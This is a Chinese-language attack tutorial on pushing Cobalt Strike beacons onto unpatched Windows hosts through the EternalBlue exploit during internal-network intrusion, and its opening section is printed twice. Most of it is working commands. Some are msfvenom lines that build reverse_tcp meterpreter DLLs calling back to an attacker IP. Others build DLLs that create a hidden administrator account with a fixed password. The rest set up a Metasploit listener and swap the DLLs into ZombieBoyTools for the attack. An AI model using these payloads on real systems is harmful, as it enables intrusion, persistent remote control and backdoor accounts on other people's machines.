该文介绍了在内网环境下,利用永恒之蓝漏洞(EternalBlue)将攻击者控制台(CS)上线的方法。前提条件是目标机器可上网、无防火墙和杀毒软件,并且存在永恒之蓝漏洞。使用Erebus插件的eterblue功能,通过MSF生成DLL文件,再利用永恒之蓝漏洞注入到目标系统中。文中给出了MSF生成不同平台DLL的命令,并详细说明了如何替换CS工具中的DLL文件,最后展示了在Double中选择目标IP和系统位数进行攻击,成功上线CS的截图。
永恒之蓝上线CS
内网有时候没办法了,有入口,但是处于一种尴尬的区域,需要扩大成果,眼前也只有几台永恒之蓝可以打了,没办法了,但是MSF又不太适合维持权限,于是想办法永恒之蓝上线CS。
前提要求:
1.目标机子出网
2.没有开启防火墙、杀软之类
3.存在永恒之蓝
Erebus插件
Erebus→pwn→eterblue
永恒之蓝上线CS
内网有时候没办法了,有入口,但是处于一种尴尬的区域,需要扩大成果,眼前也只有几台永恒之蓝可以打了,没办法了,但是MSF又不太适合维持权限,于是想办法永恒之蓝上线CS。
前提要求:
1.目标机子出网
2.没有开启防火墙、杀软之类
3.存在永恒之蓝
Erebus插件
Erebus→pwn→eterblue
tips
msf生成dll常见的命令
x64
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.116 LPORT=5555 -f dll >x64.dll
x86
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll >xxx.dll
生成 x86的命令执行dll
msfvenom -p windows/exec cmd=“net user qaxnb$ Qaxnb123. /add” exitfunc=process -a x86 -f dll > x86.dll
msfvenom -p windows/exec cmd=“net localgroup administrators qaxnb$ /add” exitfunc=process -a x86 -f dll > x861.dll
生成x64命令执行dll
msfvenom -p windows/x64/exec cmd=“net user qaxnb$ Qaxnb123. /add” exitfunc=process -a x64 -f dll > x64.dll
msf的监听
# use exploit/multi/handler
# set payload windows/x64/meterpreter/reverse_tcp
# set lhost 192.168.1.116
# set lport 5555
# exploit
永恒之蓝上线cs操作:
根据版本选择系统位数的raw
生成的payload.bin文件
然后利用msf生成对应的dll文件
要注意
64位
msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x64 --platform windows -f dll -o x64.dll
32位
msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x86 --platform windows -f dll -o x86.dll
生成的x64.dll文件
替换掉ZombieBoyTools中的x64.dll文件
Eternablue注意箭头的操作,如果出现win了,就没问题了。
Double中选好ip和系统位数然后点击Attack
CS成功上线
